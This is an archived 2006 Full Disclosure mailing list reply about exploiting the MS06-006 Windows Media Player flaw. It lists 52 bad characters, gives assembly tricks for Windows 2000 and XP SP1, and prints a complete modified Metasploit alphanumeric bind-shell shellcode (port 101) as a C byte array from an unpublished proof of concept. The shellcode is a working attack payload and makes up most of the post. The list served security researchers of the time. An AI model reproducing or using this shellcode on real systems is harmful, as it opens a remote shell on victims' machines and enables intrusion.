Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Re: MS06-06 Windows Media Player Exploitation
From: "ad () heapoverflow com" <ad () heapoverflow com>
Date: Thu, 16 Feb 2006 23:45:03 +0100

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
not sure about what you are looking for but read this below , it's
from an unpublished poc where I had to trick with 52 badchars:

-
--------------------------------------------------------------------------------------------
52 BADCHARS:

0x00 0x22 0x61 0x62 0x63 0x64 0x65 0x66
0x67 0x68 0x69 0x70 0x71 0x72 0x73 0x74
0x75 0x76 0x77 0x78 0x79 0xE0 0xE1 0xE2
0xE3 0xE4 0xE5 0xE6 0xE7 0xE8 0xE9 0xEA
0xEB 0xEC 0xED 0xEE 0xEF 0xF0 0xF1 0xF2
0xF3 0xF4 0xF5 0xF6 0xF8 0xF9 0xFA 0xFB
0xFC 0xFD 0xFE 0xFF


Due to the high number of bad chars, especially an upper/lower case
conflict, I have used the msf bind shellcode port 101 with the
PexAlphaNum encoder.

EB 03            JMP SHORT 0012EE63
59               POP ECX
EB 05            JMP SHORT 0012EE68
E8 F8FFFFFF      CALL 0012EE60

But it contains 7 bad chars as you can see, so another way is (for 2k):


83C3 1C          ADD EBX,1C
53               PUSH EBX
59               POP ECX

Because ebx+1c is a fixed addr pointing were the alphanum shellcode
starts,
and so on, is popped to ecx correctly, and 0 badchars.

And the one for XP sp1 (because no more direct pointer where I need,
but I found near the dword of a reg):

834424 08 1C     ADD DWORD PTR SS:[ESP+8],1C
895C24 08        MOV EBX,DWORD PTR SS:[ESP+8]
53               PUSH EBX
59               POP ECX

-
------------------------------------------------------------------------------------------------

/*modded metasploit bindshellcode port 101*/
char scode1[]=
"\x90\x90\x90\x90\x90\x83\xC3\x1C\x53\x59"
/*upon this text is the modded header for 2k, it changes depending the
OS you exploit, read my exploit's header or debug
for much informations, this is how I trick with 52 badchars...
thks to msf guys for all the rest, this is a great alphanum uppercase
shellcode really appreciated here :)*/
"\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x58"
"\x4e\x36\x46\x42\x46\x32\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37"
"\x45\x50\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x31\x4b\x48"
"\x4f\x45\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x48"
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x42\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x50\x4b\x54"
"\x4b\x38\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x38"
"\x49\x58\x4e\x56\x46\x32\x4e\x41\x41\x46\x43\x4c\x41\x53\x4b\x4d"
"\x46\x36\x4b\x48\x43\x44\x42\x43\x4b\x48\x42\x44\x4e\x30\x4b\x38"
"\x42\x47\x4e\x31\x4d\x4a\x4b\x58\x42\x44\x4a\x50\x50\x55\x4a\x36"
"\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x56"
"\x43\x55\x48\x56\x4a\x56\x43\x33\x44\x53\x4a\x56\x47\x37\x43\x57"
"\x44\x53\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x48\x45\x4e"
"\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x56\x44\x50"
"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x35"
"\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x55\x43\x35\x43\x55\x43\x34"
"\x43\x35\x43\x34\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x42\x30"
"\x45\x56\x48\x36\x43\x35\x49\x38\x41\x4e\x45\x39\x4a\x46\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x51"
"\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d"
"\x4a\x56\x45\x4e\x49\x54\x48\x48\x49\x44\x47\x35\x4f\x4f\x48\x4d"
"\x42\x45\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x46"
"\x47\x4e\x49\x37\x48\x4c\x49\x37\x47\x45\x4f\x4f\x48\x4d\x45\x45"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x36\x48\x46\x4a\x36\x43\x56"
"\x4d\x46\x49\x38\x45\x4e\x4c\x36\x42\x45\x49\x45\x49\x52\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x48\x44\x4e\x41\x53\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x44\x44\x4e\x52"
"\x43\x49\x4d\x48\x4c\x37\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x54\x4f\x4f"
"\x48\x4d\x4b\x45\x47\x35\x44\x45\x41\x55\x41\x35\x41\x35\x4c\x46"
"\x41\x30\x41\x55\x41\x55\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x36"
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f"
"\x43\x38\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"
"\x4a\x36\x50\x57\x4a\x4d\x44\x4e\x43\x37\x43\x45\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a";


c0ntex wrote:
No exploit, just some basic research - anyone with 100% Ascii win32
shellcode?

http://open-security.org/winmedia/index.html

--

regards
c0ntex
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/




-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (MingW32)
 
iQIVAwUBQ/UAb6+LRXunxpxfAQKY9Q//dxNp9p3Q1AzHMbvHrirmwUGDVc1Q1tdF
lR8EQvxImsMokCKUKReHaJSG2SpGdjacTBVJLIOYYQLt2efvc2C/j+OlaHC+Egna
Fvlyhyb+ACSorUtewXzMv4B9ydcVkJsEgZqbht2iundzgK22mC93zpucGOXWIVMZ
AMam5Hw9uGU6R5jgUxicV3XrU18TCOZIknTfgYuL7FUYF8foEhfwiGXPlVcFaSwE
3h1uudpbSSOgfIccrZkDnmxJ98Myli0NQ7uZ17Mcx2bYNN5p2895Mslkm8WIdloB
Rp4HgJEbCYzQOdExF6W2tdERq8HUe8bPW5qOGI7FhQRrhei7LvF7LSZTW2Icl2QH
GaRMNe3tcczGnQRAor2tUOT6go9CgV60QnoDljwAetuGRDuUZFw2RZnREFSQU5WU
YjS/yfk84Gp4BLJtefSWmvDdYe2Y5+zaRJqDeRoEhN41pBf0az/gZYJ07f1ybHyd
CKY6xtW5vtIe8tlWRsG7NBVV3Ug3Qxk4BuXGAtccJ/kO+aLu/3HgOsKwrpJnkdsK
DJSDwBWdr17YDh1VIfZZaHoDZA45xcOklf7ZGkgUsdDE8Kl3mxSLPHdSxdRpCqVx
FWf+3eyQZbvSkH81eJnLBAWG/7ojjRNRV+JjRwvMwwGstSjfKZCve9C05fGNpsD4
g1w1TdV1nR0=
=vOSt
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]